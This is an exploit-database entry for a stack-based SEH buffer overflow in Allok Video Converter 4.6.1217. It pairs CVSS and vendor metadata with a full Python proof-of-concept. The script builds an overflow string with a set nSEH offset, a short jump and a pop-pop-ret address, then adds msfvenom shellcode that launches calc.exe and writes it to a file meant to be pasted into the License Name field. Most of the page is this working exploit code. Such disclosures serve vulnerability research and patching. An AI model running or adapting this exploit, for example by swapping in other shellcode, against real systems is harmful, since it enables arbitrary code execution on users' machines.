Allok Video Converter 4.6.1217 - Stack Overflow (SEH)

vendor:

Allok Video Converter

by:

Antonio de la Piedra

7.8

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Allok Video Converter

Affected Version From: 4.6.1217

Affected Version To: 4.6.1217

Patch Exists: YES

Related CWE: N/A

CPE: a:alloksoft:allok_video_converter

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 SP1 32-bit

2020

Allok Video Converter 4.6.1217 – Stack Overflow (SEH)

A stack-based buffer overflow vulnerability exists in Allok Video Converter 4.6.1217. An attacker can execute arbitrary code by copying the contents of poc.txt into the License Name input field of Allok Video Converter 4.6.1217. This will cause a stack-based buffer overflow, allowing the attacker to execute arbitrary code.

Mitigation:

Update to the latest version of Allok Video Converter.

Source

Exploit-DB raw data:

# Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.alloksoft.com
# Software Link: https://www.alloksoft.com/allok_vconverter.exe
# Version: 4.6.1217
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt into the License Name input field
# of Allok Video Converter 4.6.1217 to execute calc.exe.

nseh_offset = 780
total = 1000

# msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode=
_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc =  b""
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"

poc = ""
poc += "A"*nseh_offset
poc += "\xEB\x0b\x90\x90"   # jmp forward (nseh)
poc +=  "\x59\x78\x03\x10"  # pop pop ret (seh)
poc += "\x90"*20
poc += shellcode_calc
poc += "D"*(total - len(poc))

file = open("poc_seh.txt","w")
file.write(poc)
file.close()